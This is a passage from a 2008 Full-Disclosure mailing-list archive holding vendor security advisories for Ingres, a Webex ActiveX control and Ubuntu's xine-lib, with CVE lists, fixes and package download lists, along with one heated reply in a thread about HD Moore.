(int.lnx/00)LFS Linux Itanium II 2.6/xxxx (i64.lnx/00) Linux S/390 II 2.6/xxxx (ibm.lnx/00) Solaris SPARC 32bit II 2.6/xxxx (su4.us5/00) Solaris SPARC 32bit double II 2.6/xxxx (su4.us5/00)DBL Solaris SPARC 64bit II 2.6/xxxx (su9.us5/00) Note: 1. If the Ingres release embedded in your product is not 2.6, please get the appropriate update here. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support. 3. For HP-UX platform with CA ARCserve Backup 11.1 or 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, RO01277: https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&a ctionID=3 and follow the enclosed instructions to install the security patch. Workaround: None References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA Products That Embed Ingres https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989 Solution Document Reference APARs: RO01277 (ARCserve only) CA Security Response Blog posting: CA Products That Embed Ingres Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx Reported By: iDefense Labs Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732 Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733 Ingres Security Vulnerability Announcement as of August 01, 2008 http://www.ingres.com/support/security-alert-080108.php CVE References: CVE-2008-3356 - Ingres verifydb file create permission override. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356 CVE-2008-3357 - Ingres un-secure directory privileges with utility ingvalidpw. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357 CVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://support.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782 Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, 1 CA Plaza, Islandia, NY 11749 Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFImcgXeSWR3+KUGYURAjGvAJ94BwdxnyhMhSwEUQ4ovaE0z3XyGQCeKGs5 vHhaXlK2FC1XCqZuUkOTmcQ= =IFgM -----END PGP SIGNATURE----- From elazar at hushmail.com Wed Aug 6 18:20:02 2008 From: elazar at hushmail.com (Elazar Broad) Date: Wed, 06 Aug 2008 13:20:02 -0400 Subject: [Full-disclosure] Webex atucfobj Module ActiveX Control Buffer Overflow Vulnerability Message-ID: <20080806172004.233D711803C@mailserver5.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Who: Webex http://www.webex.com/ What: Webex Meeting Manager http://support.webex.com/support/downloads.html How: The Webex Meeting Manager utilizes several ActiveX controls, one of which is vulnerable to a stack based buffer overflow. The atucfobj Module contains a single method called NewObject() who's only parameter is vulnerable to this issue. This issue has been confirmed in version 20.2008.2601.4928, prior versions are believed to vulnerable as well. atucfobj.dll version 20.2008.2601.4928 {32E26FD9-F435-4A20-A561-35D4B987CFDC} Fix: The vendor has released version 20.2008.2606.4919 of this control, which fixes this issue. The control should be updated when the user joins a meeting. Workaround: Set the killbit for the affected control. See http://support.microsoft.com/kb/240797 Credit: When I reported this issue to the vendor, they had stated that they were aware of it, but would not say whether it was the result of an internal audit or an independent researcher. Timeline: 06/20/2008 -> Issue reported to the vendor 06/21/2008 <- Vendor responds asking for further details 06/22/2008 -> Details sent with PoC 06/25/2008 <- Vendor responds stating that they are aware of this issue 08/06/2008 - Disclosure Elazar -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkiZ3PAACgkQi04xwClgpZiyOgP8CM9oC+m3tr5TBU6ZbvacAcq/SqXu zIUjqfGWz/GNaRRXISzPLrp7aYwepxXL/uxp+zmHR+h0phGOf2FoLmuBY1g3WULmaFu1 oQbGbVfNuS21qH/YvC9mWuOFSeoYOogsyKDGX1Iha6jNDsj5+JlbAIsqk9xwyb021eTm BpGN3W8= =tQOJ -----END PGP SIGNATURE----- -- Hotel pics, info and virtual tours. Click here to book a hotel online. http://tagline.hushmail.com/fc/Ioyw6h4eRCkjWyUGURkqKkn8TNo5LNJlfxlxQ4nlv0rtj3ey80N9EU/ From trejrco at gmail.com Wed Aug 6 20:43:39 2008 From: trejrco at gmail.com (TJ) Date: Wed, 6 Aug 2008 15:43:39 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> Message-ID: <008001c8f7fc$ba7afa20$2f70ee60$@com> Note that the costs being discussed were purely financial, and you rushed headlong into adding human lives. That is, to be polite (if blunt) - wrong. The "cost" conversation is actually how real decisions are made, in the real world. /TJ >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >bounces at lists.grok.org.uk] On Behalf Of n3td3v >Sent: Tuesday, August 05, 2008 3:36 PM >To: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] Media backlash begins against HD Moore and >I)ruid > >On Tue, Aug 5, 2008 at 7:57 PM, wrote: >> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: >> >>> Are you suggesting HD Moore had prior knowledge that the Austin Texas >>> AT&T servers were vulnerable? >> >> No - simply saying that either they were vulnerable, or they weren't. >> If they weren't vulnerable, HD didn't have to do anything. And even >> if they *were*, somebody would still have to actually *attack* them. >> >> And even if they *got* attacked, it's quite possible that the upsides >> of not bothering to do something outweighed the risks. If you >> estimate that the cost (including "things you could have spent your >> time doing") is more than the losses, why bother? "Even if we *got* >> whacked, we'd lose maybe $500. But in the time I'd waste dealing with >> the issue, I could generate something that will get us $2,000 in >> revenue. So if I fix it, I lose $1500, and if I ignore it, I come out >$1,500 ahead if we get hit, and $2,000 if we don't". >> > >Is what you're describing not against the law Valdis, it sure sounds like it >to me. Some kind of gross negligence... > >http://legal-dictionary.thefreedictionary.com/Gross+negligence >http://legal-dictionary.thefreedictionary.com/negligence > >Is this what goes on at Virginia Tech on a regular basis? Maybe the >authorities should be looking into you a lot more while they are looking >into HD Moore. ;) > >I wonder if the the intelligence services thought like you before 9/11 and >7/7 eh...I get the feeling they did. > >For sure people like you who support this kind of activity should be >investigated. It sounds criminal. > >Have you ever carried out this kind of activity Valdis where you put >security and people at risk to make and/or save money? > >If cyber-terrorism is going to become a real threat, we don't need people >like Valdis around and we should sure keep track of him. > >Would you allow a cyber-9-11 to happen Valdis if there was money involved? >I'm starting to become worried about you dude, maybe I should be e-mailing >the folks at Virginia Tech this thread, and perhaps, just perhaps the F.B.I >and see what they think about what you've just told me. > >You seem to be normalizing what you've just described to me as normal run- >of-the-mill legal activity, when it clearly isn't. > >To me what you've just described is illegal, criminal and wrong. > >All the best, > >n3td3v > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From jamie at canonical.com Wed Aug 6 20:37:14 2008 From: jamie at canonical.com (Jamie Strandboge) Date: Wed, 6 Aug 2008 15:37:14 -0400 Subject: [Full-disclosure] [USN-635-1] xine-lib vulnerabilities Message-ID: <20080806193714.GA29829@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-635-1 August 06, 2008 xine-lib vulnerabilities CVE-2008-0073, CVE-2008-0225, CVE-2008-0238, CVE-2008-0486, CVE-2008-1110, CVE-2008-1161, CVE-2008-1482, CVE-2008-1686, CVE-2008-1878 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libxine-main1 1.1.1+ubuntu2-7.9 Ubuntu 7.04: libxine-main1 1.1.4-2ubuntu3.1 Ubuntu 7.10: libxine1 1.1.7-1ubuntu1.3 Ubuntu 8.04 LTS: libxine1 1.1.11.1-1ubuntu3.1 After a standard system upgrade you need to restart applications linked against xine-lib to effect the necessary changes. Details follow: Alin Rad Pop discovered an array index vulnerability in the SDP parser. If a user or automated system were tricked into opening a malicious RTSP stream, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0073) Luigi Auriemma discovered that xine-lib did not properly check buffer sizes in the RTSP header-handling code. If xine-lib opened an RTSP stream with crafted SDP attributes, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0225, CVE-2008-0238) Damian Frizza and Alfredo Ortega discovered that xine-lib did not properly validate FLAC tags. If a user or automated system were tricked into opening a crafted FLAC file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0486) It was discovered that the ASF demuxer in xine-lib did not properly check the length if the ASF header. If a user or automated system were tricked into opening a crafted ASF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1110) It was discovered that the Matroska demuxer in xine-lib did not properly verify frame sizes. If xine-lib opened a crafted ASF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1161) Luigi Auriemma discovered multiple integer overflows in xine-lib. If a user or automated system were tricked into opening a crafted FLV, MOV, RM, MVE, MKV or CAK file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1482) It was discovered that xine-lib did not properly validate its input when processing Speex file headers. If a user or automated system were tricked into opening a specially crafted Speex file, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program. (CVE-2008-1686) Guido Landi discovered a stack-based buffer overflow in xine-lib when processing NSF files. If xine-lib opened a specially crafted NSF file with a long NSF title, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program. (CVE-2008-1878) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.9.diff.gz Size/MD5: 25244 c709cf6894d6425dd46e8f132615573c http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.9.dsc Size/MD5: 1113 f70db346860ad8541f3681154e9bf3bc http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz Size/MD5: 6099365 5d0f3988e4d95f6af6f3caf2130ee992 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_amd64.deb Size/MD5: 116324 84bb0ee2f6090e64162ff2f2a0f020f1 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_amd64.deb Size/MD5: 2616066 1a99049356180801943cf96c0263fe28 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_i386.deb Size/MD5: 116320 6dc097583c9ad936b94ced44a8616c27 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_i386.deb Size/MD5: 2935352 acfa8daaf8ea120c1beadc1926eaf08d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_powerpc.deb Size/MD5: 116334 c35db71e1841640f35b6eb7010baf3d3 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_powerpc.deb Size/MD5: 2726444 0d578184c6e857aca6d0ccccbdf97f2a sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_sparc.deb Size/MD5: 116340 c0c39eb2bfe2a4068528bd73c4892fcb http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_sparc.deb Size/MD5: 2592618 89d889a9c3c508c1f122511a9536f7c2 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.4-2ubuntu3.1.diff.gz Size/MD5: 29541 2d48096e5edf630f163bed209cd659d7 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.4-2ubuntu3.1.dsc Size/MD5: 1254 9ec066aadcf80896ac8a12dc47f65519 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.4.orig.tar.gz Size/MD5: 8603909 6631bf12e1e9bfc740797e0c56f46be6 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/multiverse/x/xine-lib/libxine-extracodecs_1.1.4-2ubuntu3.1_all.deb Size/MD5: 39972 046548cee566f6aec89620f7eafa2158 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine-main1_1.1.4-2ubuntu3.1_all.deb Size/MD5: 39954 9f170fb6984ace5fb4d8c9177339eb9f http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-plugins_1.1.4-2ubuntu3.1_all.deb Size/MD5: 40194 08c8015241168c9fec32ec46239557db amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.4-2ubuntu3.1_amd64.deb Size/MD5: 298136 fb5abad09abcc593744754079b14121d http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.4-2ubuntu3.1_amd64.deb Size/MD5: 3029478 68dd8f4ae60b3b4eea78e213938e638d http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-kde_1.1.4-2ubuntu3.1_amd64.deb Size/MD5: 44050 fb7af09d494a0cc5a9c7f261b9f9fd89 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.4-2ubuntu3.1_amd64.deb Size/MD5: 2360482 a9b1699dcc18f5fb2d365606c92535f2 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.4-2ubuntu3.1_amd64.deb Size/MD5: 63488 8540a5888532db21c323ffb1da0197e5 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.4-2ubuntu3.1_amd64.deb Size/MD5: 1514284 792330b42bb37a7437602bbc77b8a21d http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.4-2ubuntu3.1_amd64.deb Size/MD5: 52252 7b277738898bcd2bd40d2f44b169e666 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.4-2ubuntu3.1_i386.deb Size/MD5: 298150 972096a11bcd4d2e4cb3c3b42dca97ae http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.4-2ubuntu3.1_i386.deb Size/MD5: 3152580 73fcf7ca9f7e9e33fe1fee1f12ff69cb http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-kde_1.1.4-2ubuntu3.1_i386.deb Size/MD5: 43746 d05ffa7e690edcaf0b420335fbbf4f0b http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.4-2ubuntu3.1_i386.deb Size/MD5: 2473672 eb93260e20582c906a9eb6e160c4d314 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.4-2ubuntu3.1_i386.deb Size/MD5: 64758 9bf75b87685522d576c5f3d044f12694 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.4-2ubuntu3.1_i386.deb Size/MD5: 1571704 2b35810bd99b9b94c2c4c132e2f72d64 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.4-2ubuntu3.1_i386.deb Size/MD5: 52164 4a0304e4b51b4b7dbb7ebd374939db95 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.4-2ubuntu3.1_powerpc.deb Size/MD5: 298132 cb62b3c1089933a5a5dae8486e034351 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.4-2ubuntu3.1_powerpc.deb Size/MD5: 3090286 a5a28d21478b714c8a4f894014deb7e1 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-kde_1.1.4-2ubuntu3.1_powerpc.deb Size/MD5: 46230 d239dcb2866e7a8e7afff9560708593f http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.4-2ubuntu3.1_powerpc.deb Size/MD5: 2569192 2e09ee9de137d21d02bdfec9262f86da http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.4-2ubuntu3.1_powerpc.deb Size/MD5: 66296 6b94869dbbee03381677ed6a99e52435 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.4-2ubuntu3.1_powerpc.deb Size/MD5: 1526458 b012304ddcec0cc7826b857777cdbfb8 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.4-2ubuntu3.1_powerpc.deb Size/MD5: 57316 39f635ce70bc2a05754b8f74688f7022 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.4-2ubuntu3.1_sparc.deb Size/MD5: 298136 b643d9a7330bfae7a7f4e5a6447af199 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.4-2ubuntu3.1_sparc.deb Size/MD5: 2801530 0d36866dfedad41744bf7b39b5c2cb30 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-kde_1.1.4-2ubuntu3.1_sparc.deb Size/MD5: 43772 bee313cddae10e44c9f1b11f546bf229 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.4-2ubuntu3.1_sparc.deb Size/MD5: 2339948 2a5834f91e5ff089b31503d64d8fa56f http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.4-2ubuntu3.1_sparc.deb Size/MD5: 60004 272ae4956a69e49bf8d4cc42a20fd236 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.4-2ubuntu3.1_sparc.deb Size/MD5: 1560720 4c8dc63d4a7612f1a02b5ab15dac6864 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.4-2ubuntu3.1_sparc.deb Size/MD5: 52084 e4d5b0924a01bed2b4abbfda2d1cacf4 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.7-1ubuntu1.3.diff.gz Size/MD5: 27784 435a101ffb894716eecd071f5939dbaf http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.7-1ubuntu1.3.dsc Size/MD5: 1607 06af830d473dd8e4b04e6b9ee784b9e6 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.7.orig.tar.gz Size/MD5: 8868650 a613a3adf44b5098e04842250dbd2251 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.7-1ubuntu1.3_all.deb Size/MD5: 320886 d114061f1b5d852c0cc87544777688be http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-doc_1.1.7-1ubuntu1.3_all.deb Size/MD5: 125992 8c5035155b647ce7e670c10d9e6f90e3 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-plugins_1.1.7-1ubuntu1.3_all.deb Size/MD5: 44762 67724629576a3e71c06b4c70abdc4905 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.3_amd64.deb Size/MD5: 3139966 bf87a04d32dbe428beab47af85bd7380 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.3_amd64.deb Size/MD5: 2382002 86b07e8bf31ec1cafe9c40e27e993084 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.3_amd64.deb Size/MD5: 78426 1fd31997b0a930bf18cd98084b3bafce http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.3_amd64.deb Size/MD5: 445200 7cce13fee53be6dcb3e20a7b8d144cb6 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.3_amd64.deb Size/MD5: 59296 7cb8fe644e5919dd8a1e567d95429237 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.3_i386.deb Size/MD5: 3269686 7dfe3085034a5df0b84d39d527066257 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.3_i386.deb Size/MD5: 2490502 a02077abd97985a4a1ec76f4f1cb7232 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.3_i386.deb Size/MD5: 79342 12cb1b67ff7f707bea1f221d78be2fb4 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.3_i386.deb Size/MD5: 446502 26856c3a255125cba5eb850dcbe6b70d http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.3_i386.deb Size/MD5: 58806 41b73db30c0497f4b524116b03c137e6 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.3_lpia.deb Size/MD5: 3049478 4e5bfc35c67103a98132643fdcb53bca http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.3_lpia.deb Size/MD5: 2363212 c99a12f536abdb2e735205b7435619b6 http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.3_lpia.deb Size/MD5: 78420 42bb7f916d7cb1ea6e4dad65aecd79a1 http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.3_lpia.deb Size/MD5: 444696 4ecb5410df0c524dd288f60ae3478985 http://ports.ubuntu.com/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.3_lpia.deb Size/MD5: 58674 c06871fcadba77a3bececcddc57e178b powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.3_powerpc.deb Size/MD5: 3186752 f87ab41b6445057e4a6ee7c562c23a7a http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.3_powerpc.deb Size/MD5: 2583712 ca3ce19217abfbf521d706b6b7970155 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.3_powerpc.deb Size/MD5: 83148 1c9bd779b40a88b2746379fa087b0142 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.3_powerpc.deb Size/MD5: 477848 2d6e95998d82fa719a378784e5eac821 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.3_powerpc.deb Size/MD5: 65296 4fbf4cfa6bb9ad2821ca05e66f94cd30 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.7-1ubuntu1.3_sparc.deb Size/MD5: 2858646 a9b393ba169ca85c2ab788dcee36909d http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.7-1ubuntu1.3_sparc.deb Size/MD5: 2351408 f3db946bc67f6847746ba50a96da39ce http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-console_1.1.7-1ubuntu1.3_sparc.deb Size/MD5: 74320 748da95afa87e6f9d74a2efdf6fde9a3 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.7-1ubuntu1.3_sparc.deb Size/MD5: 453450 0f56c6e1658b0042f0c27da93d21a583 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.7-1ubuntu1.3_sparc.deb Size/MD5: 58868 18c9981211d5660402bcfef86d949b7c Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.11.1-1ubuntu3.1.diff.gz Size/MD5: 48299 9fcc3809569e6ba09101a9f5a936c5f0 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.11.1-1ubuntu3.1.dsc Size/MD5: 1867 9e2d7ecfa9581208ca352a7ccc6ddd68 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.11.1.orig.tar.gz Size/MD5: 9056527 08f6d8ed03d98ec43a5ee1386ce83a00 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-doc_1.1.11.1-1ubuntu3.1_all.deb Size/MD5: 141726 cdf14069c770dbc97103107d85662d4c http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-all-plugins_1.1.11.1-1ubuntu3.1_all.deb Size/MD5: 51972 8a3744a44be18a577345bebf730dd41b http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-plugins_1.1.11.1-1ubuntu3.1_all.deb Size/MD5: 51958 6bd4bbf922cb1908fc42b22ea0b1a45c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 326908 74a4c0652f892a10f0a84b973054c9e0 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 1219992 7b51803254bf6fa801c5dfce9853b34e http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 58114 d54407fbcd75fb060d0ca9f2a6df8a4d http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 3957520 bbca1c33b0a2bdeb2ac2813c0b937f46 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 939452 bbaf9959c4c451df8863e4e02a695fa2 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 207578 dac6c3b616fd949a49872811d999c2cb http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 1310 a6d72287e1c41f41cb00117d1fce97df http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-ffmpeg_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 394852 80734e87080e7e1745de43ca9f5a3972 http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-gnome_1.1.11.1-1ubuntu3.1_amd64.deb Size/MD5: 15336 ce53f8d14a50f855a355ce8c0cf5e8e2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 326892 54ec711c7595194026b08ab33d055c56 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 1327966 25e01a3662b5b450fb2aa93f92ff83d2 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 58108 97be8610709156d1999cc6138b666507 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.11.1-1ubuntu3.1_i386.deb Size/MD5: 4049554 1741c377edf8eee68db15e30cf658fa4 